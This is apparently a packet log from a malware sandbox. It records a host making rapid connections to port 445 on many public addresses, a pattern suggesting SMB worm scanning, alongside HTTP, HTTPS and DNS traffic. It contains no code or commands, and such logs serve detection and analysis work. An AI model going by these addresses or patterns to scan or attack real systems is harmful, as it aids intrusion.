Jan 15, 2025 16:58:29.178325891 CET	445	50043	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:29.180951118 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:29.181003094 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:29.181044102 CET	50043	445	192.168.2.8	84.147.160.1
Jan 15, 2025 16:58:29.185899019 CET	445	50043	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:29.185915947 CET	445	50043	84.147.160.1	192.168.2.8
Jan 15, 2025 16:58:29.249445915 CET	50200	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.254317045 CET	445	50200	84.147.160.2	192.168.2.8
Jan 15, 2025 16:58:29.254391909 CET	50200	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.254486084 CET	50200	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.254831076 CET	50201	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.260656118 CET	445	50200	84.147.160.2	192.168.2.8
Jan 15, 2025 16:58:29.260703087 CET	445	50201	84.147.160.2	192.168.2.8
Jan 15, 2025 16:58:29.260773897 CET	50200	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.260809898 CET	50201	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.261179924 CET	50201	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:29.266521931 CET	445	50201	84.147.160.2	192.168.2.8
Jan 15, 2025 16:58:29.811631918 CET	50220	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:29.816606998 CET	445	50220	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:29.816665888 CET	50220	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:29.816701889 CET	50220	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:29.821516991 CET	445	50220	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:30.040874004 CET	445	50173	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:30.044152021 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:30.073898077 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:30.074101925 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:30.078933001 CET	445	50173	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:30.078957081 CET	445	50173	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:30.136976004 CET	50227	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.141876936 CET	445	50227	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:30.143521070 CET	50227	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.143601894 CET	50227	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.143918037 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.148608923 CET	445	50227	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:30.148665905 CET	445	50228	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:30.148667097 CET	50227	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.148729086 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.148772955 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:30.153510094 CET	445	50228	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:30.228981972 CET	445	50046	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:30.232980013 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:30.270663977 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:30.270821095 CET	50046	445	192.168.2.8	28.183.62.1
Jan 15, 2025 16:58:30.275646925 CET	445	50046	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:30.275669098 CET	445	50046	28.183.62.1	192.168.2.8
Jan 15, 2025 16:58:31.240786076 CET	445	50047	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:31.240914106 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:31.242130995 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:31.242130995 CET	50047	445	192.168.2.8	75.165.172.1
Jan 15, 2025 16:58:31.246953964 CET	445	50047	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:31.246973038 CET	445	50047	75.165.172.1	192.168.2.8
Jan 15, 2025 16:58:31.308299065 CET	50273	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.313349009 CET	445	50273	75.165.172.2	192.168.2.8
Jan 15, 2025 16:58:31.313437939 CET	50273	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.313529015 CET	50273	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.313874960 CET	50274	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.318412066 CET	445	50273	75.165.172.2	192.168.2.8
Jan 15, 2025 16:58:31.318475962 CET	50273	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.318701029 CET	445	50274	75.165.172.2	192.168.2.8
Jan 15, 2025 16:58:31.318763971 CET	50274	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.318798065 CET	50274	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:31.323631048 CET	445	50274	75.165.172.2	192.168.2.8
Jan 15, 2025 16:58:31.605113029 CET	50290	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:31.610078096 CET	445	50290	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:31.610188961 CET	50290	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:31.610224962 CET	50290	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:31.615070105 CET	445	50290	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:31.729383945 CET	445	50050	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:31.729517937 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:31.729613066 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:31.729635000 CET	50050	445	192.168.2.8	91.57.194.1
Jan 15, 2025 16:58:31.734582901 CET	445	50050	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:31.734627008 CET	445	50050	91.57.194.1	192.168.2.8
Jan 15, 2025 16:58:31.964472055 CET	445	50228	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:31.964680910 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:31.964680910 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:31.964680910 CET	50228	445	192.168.2.8	41.232.2.3
Jan 15, 2025 16:58:31.969530106 CET	445	50228	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:31.969551086 CET	445	50228	41.232.2.3	192.168.2.8
Jan 15, 2025 16:58:33.178256035 CET	445	50053	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:33.178344965 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:33.181824923 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:33.181855917 CET	50053	445	192.168.2.8	9.32.108.1
Jan 15, 2025 16:58:33.186654091 CET	445	50053	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:33.186677933 CET	445	50053	9.32.108.1	192.168.2.8
Jan 15, 2025 16:58:33.215487003 CET	445	50054	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:33.215538979 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:33.217309952 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:33.217339039 CET	50054	445	192.168.2.8	8.188.251.1
Jan 15, 2025 16:58:33.222162008 CET	445	50054	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:33.222182989 CET	445	50054	8.188.251.1	192.168.2.8
Jan 15, 2025 16:58:34.477097034 CET	445	50057	51.20.135.1	192.168.2.8
Jan 15, 2025 16:58:34.477157116 CET	50057	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:35.182041883 CET	445	50058	46.252.194.1	192.168.2.8
Jan 15, 2025 16:58:35.182624102 CET	50058	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:35.723346949 CET	50063	445	192.168.2.8	203.228.45.2
Jan 15, 2025 16:58:35.723428011 CET	50274	445	192.168.2.8	75.165.172.2
Jan 15, 2025 16:58:35.723459959 CET	50095	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:35.723505974 CET	50083	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:35.723527908 CET	50074	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:35.723546982 CET	50103	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:35.723588943 CET	50152	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:35.723596096 CET	50117	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:35.723732948 CET	50057	445	192.168.2.8	51.20.135.1
Jan 15, 2025 16:58:35.723764896 CET	50058	445	192.168.2.8	46.252.194.1
Jan 15, 2025 16:58:35.723790884 CET	50061	445	192.168.2.8	2.226.240.1
Jan 15, 2025 16:58:35.723807096 CET	50066	445	192.168.2.8	90.136.226.1
Jan 15, 2025 16:58:35.723828077 CET	50067	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:35.723856926 CET	50077	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:35.723875046 CET	50078	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:35.723896980 CET	50081	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:35.723943949 CET	50087	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:35.723947048 CET	50086	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:35.723979950 CET	50090	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:35.723993063 CET	50093	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:35.724014997 CET	50108	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:35.724042892 CET	50098	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:35.724073887 CET	50126	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:35.724107027 CET	50163	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:35.724175930 CET	50201	445	192.168.2.8	84.147.160.2
Jan 15, 2025 16:58:35.724211931 CET	50220	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:35.724235058 CET	50290	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:38.397264004 CET	80	50071	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:38.397543907 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:38.397543907 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:38.402460098 CET	80	50071	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:38.477019072 CET	80	50073	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:38.477098942 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:38.477143049 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:38.481986046 CET	80	50073	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:46.183175087 CET	50128	443	192.168.2.8	92.113.16.129
Jan 15, 2025 16:58:46.183357000 CET	443	50128	92.113.16.129	192.168.2.8
Jan 15, 2025 16:58:46.183434963 CET	50128	443	192.168.2.8	92.113.16.129
Jan 15, 2025 16:58:46.198126078 CET	50492	443	192.168.2.8	76.76.21.21
Jan 15, 2025 16:58:46.198215008 CET	443	50492	76.76.21.21	192.168.2.8
Jan 15, 2025 16:58:46.198318958 CET	50492	443	192.168.2.8	76.76.21.21
Jan 15, 2025 16:58:48.933018923 CET	50193	443	192.168.2.8	104.18.243.107
Jan 15, 2025 16:58:48.933135033 CET	443	50193	104.18.243.107	192.168.2.8
Jan 15, 2025 16:58:48.933213949 CET	50193	443	192.168.2.8	104.18.243.107
Jan 15, 2025 16:58:50.122950077 CET	61792	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:58:50.127849102 CET	53	61792	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.127954960 CET	61792	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:58:50.132953882 CET	53	61792	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.638041019 CET	53	61792	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.642935991 CET	61792	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:58:50.648073912 CET	53	61792	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.648145914 CET	61792	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:58:52.084444046 CET	61806	443	192.168.2.8	188.114.96.3
Jan 15, 2025 16:58:52.084475994 CET	443	61806	188.114.96.3	192.168.2.8
Jan 15, 2025 16:58:52.084548950 CET	61806	443	192.168.2.8	188.114.96.3
Jan 15, 2025 16:59:06.198775053 CET	50492	443	192.168.2.8	76.76.21.21
Jan 15, 2025 16:59:06.198848009 CET	443	50492	76.76.21.21	192.168.2.8
Jan 15, 2025 16:59:06.198999882 CET	50492	443	192.168.2.8	76.76.21.21
Jan 15, 2025 16:59:08.421050072 CET	61898	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.426501989 CET	80	61898	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:08.426585913 CET	61898	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.426640987 CET	61898	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.432734966 CET	80	61898	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:08.432790041 CET	61898	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.437580109 CET	80	61898	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:08.480412006 CET	61900	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.485266924 CET	80	61900	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:08.485346079 CET	61900	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.485380888 CET	61900	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.490142107 CET	80	61900	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:08.490201950 CET	61900	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:08.494993925 CET	80	61900	88.198.69.43	192.168.2.8
Jan 15, 2025 16:59:09.292828083 CET	61906	443	192.168.2.8	198.49.23.145
Jan 15, 2025 16:59:09.292864084 CET	443	61906	198.49.23.145	192.168.2.8
Jan 15, 2025 16:59:09.292917967 CET	61906	443	192.168.2.8	198.49.23.145
Jan 15, 2025 16:59:12.089232922 CET	61806	443	192.168.2.8	188.114.96.3
Jan 15, 2025 16:59:12.089308023 CET	443	61806	188.114.96.3	192.168.2.8
Jan 15, 2025 16:59:12.089361906 CET	61806	443	192.168.2.8	188.114.96.3
Jan 15, 2025 16:59:25.624663115 CET	61898	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:59:25.624721050 CET	61906	443	192.168.2.8	198.49.23.145
Jan 15, 2025 16:59:25.625226021 CET	61900	80	192.168.2.8	88.198.69.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 16:57:15.577267885 CET	63761	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:57:15.586266041 CET	53	63761	1.1.1.1	192.168.2.8
Jan 15, 2025 16:57:25.564984083 CET	53	64320	1.1.1.1	192.168.2.8
Jan 15, 2025 16:57:25.575037003 CET	53	59085	1.1.1.1	192.168.2.8
Jan 15, 2025 16:57:28.691143990 CET	64182	53	192.168.2.8	1.1.1.1
Jan 15, 2025 16:57:28.700861931 CET	53	64182	1.1.1.1	192.168.2.8
Jan 15, 2025 16:57:51.705912113 CET	138	138	192.168.2.8	192.168.2.255
Jan 15, 2025 16:58:17.019062996 CET	53	61724	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:17.028170109 CET	53	57746	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.678067923 CET	53	53292	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.689394951 CET	53	51128	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.699764013 CET	53	61781	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.717859983 CET	53	58896	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.740156889 CET	53	50343	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.751283884 CET	53	64845	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.761869907 CET	53	57058	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.772902966 CET	53	60729	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.784063101 CET	53	54671	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.795430899 CET	53	55961	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.808588982 CET	53	55185	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.868117094 CET	53	65526	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.883945942 CET	53	56444	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.894757032 CET	53	58019	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:25.970805883 CET	53	56660	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.053287983 CET	53	57506	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.129336119 CET	53	50656	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.226914883 CET	53	59777	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.237474918 CET	53	56328	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.411426067 CET	53	58428	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.587388992 CET	53	60299	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.748153925 CET	53	56410	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.759663105 CET	53	64748	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:26.928416967 CET	53	58922	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.089598894 CET	53	54988	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.099725962 CET	53	49895	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.110449076 CET	53	56895	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.126667023 CET	53	56220	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.137155056 CET	53	63949	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.148541927 CET	53	50533	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.159881115 CET	53	56403	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.170531034 CET	53	49407	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.180171013 CET	53	62001	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.191492081 CET	53	50354	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.361083984 CET	53	54205	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.519859076 CET	53	49580	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.531750917 CET	53	52908	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.541338921 CET	53	60941	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.552525043 CET	53	58229	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.720545053 CET	53	52930	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.731307983 CET	53	59675	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.742270947 CET	53	50078	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.751441956 CET	53	51984	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.760987043 CET	53	63538	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.771727085 CET	53	52164	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.783482075 CET	53	61484	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.949646950 CET	53	51824	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.960237980 CET	53	61097	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:27.970500946 CET	53	54894	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:48.943461895 CET	53	56118	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:48.953186989 CET	53	61145	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:48.963905096 CET	53	57139	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.129981041 CET	53	58362	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.142441034 CET	53	62586	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.304966927 CET	53	57354	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.315110922 CET	53	57076	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.326586962 CET	53	56012	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.336996078 CET	53	53206	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.498584032 CET	53	55800	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.509875059 CET	53	52654	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.520354986 CET	53	54935	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.699244022 CET	53	59608	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.705637932 CET	53	59608	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.861979961 CET	53	54088	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.873217106 CET	53	64326	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.885520935 CET	53	57827	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:49.896423101 CET	53	59463	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.060941935 CET	53	64119	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.071346998 CET	53	62917	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.082734108 CET	53	57925	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.093359947 CET	53	57491	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.104197979 CET	53	56799	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.114897013 CET	53	62710	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.122451067 CET	53	53013	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.800045013 CET	53	58025	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.810967922 CET	53	52020	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.821660042 CET	53	64907	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.831649065 CET	53	53309	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.841964960 CET	53	63413	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:50.852941036 CET	53	56158	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.014122963 CET	53	56925	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.024272919 CET	53	58790	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.034744024 CET	53	59234	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.194996119 CET	53	62129	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.369190931 CET	53	59435	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.381172895 CET	53	55250	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.393301010 CET	53	62305	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.551785946 CET	53	62950	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.562875986 CET	53	60421	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.574031115 CET	53	54649	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.585158110 CET	53	50011	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.594937086 CET	53	57940	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.605928898 CET	53	63348	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.623728991 CET	53	53722	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.633764029 CET	53	65271	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.649527073 CET	53	62520	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.661390066 CET	53	57037	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.823533058 CET	53	55164	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.834578037 CET	53	56545	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:51.845736027 CET	53	61718	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:52.012582064 CET	53	63540	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:52.023865938 CET	53	57634	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:52.034324884 CET	53	58994	1.1.1.1	192.168.2.8
Jan 15, 2025 16:58:52.045413971 CET	53	56574	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.208797932 CET	53	65319	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.224262953 CET	53	56722	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.237534046 CET	53	61597	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.249871969 CET	53	58039	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.260696888 CET	53	52777	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.271836042 CET	53	64990	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.282334089 CET	53	61416	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.441374063 CET	53	62482	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.606719017 CET	53	54931	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.617566109 CET	53	55352	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.629246950 CET	53	51055	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.639729023 CET	53	60615	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.812975883 CET	53	62774	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.825613022 CET	53	50080	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.836265087 CET	53	57622	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:06.846323967 CET	53	58549	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.010788918 CET	53	59526	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.022918940 CET	53	58656	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.033428907 CET	53	54427	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.044606924 CET	53	50457	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.059453011 CET	53	53423	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.218390942 CET	53	50642	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.381973028 CET	53	59621	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.392991066 CET	53	60012	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.402645111 CET	53	58033	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.413516045 CET	53	50252	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.575265884 CET	53	55460	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.732688904 CET	53	55337	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.745672941 CET	53	60333	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.759087086 CET	53	59432	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.770684004 CET	53	54006	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.782800913 CET	53	57136	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.940789938 CET	53	58039	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.951905966 CET	53	58230	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:07.962873936 CET	53	60496	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.122174025 CET	53	57912	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.281109095 CET	53	61016	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.411401033 CET	53	63409	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.420593023 CET	53	53632	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.446822882 CET	53	63000	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.457202911 CET	53	56784	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.467772961 CET	53	63413	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.478197098 CET	53	64114	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.488238096 CET	53	54887	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.498240948 CET	53	64490	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.507699013 CET	53	53324	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.519346952 CET	53	54865	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.530193090 CET	53	52661	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.541234970 CET	53	61254	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.551254034 CET	53	60638	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.561302900 CET	53	63217	1.1.1.1	192.168.2.8
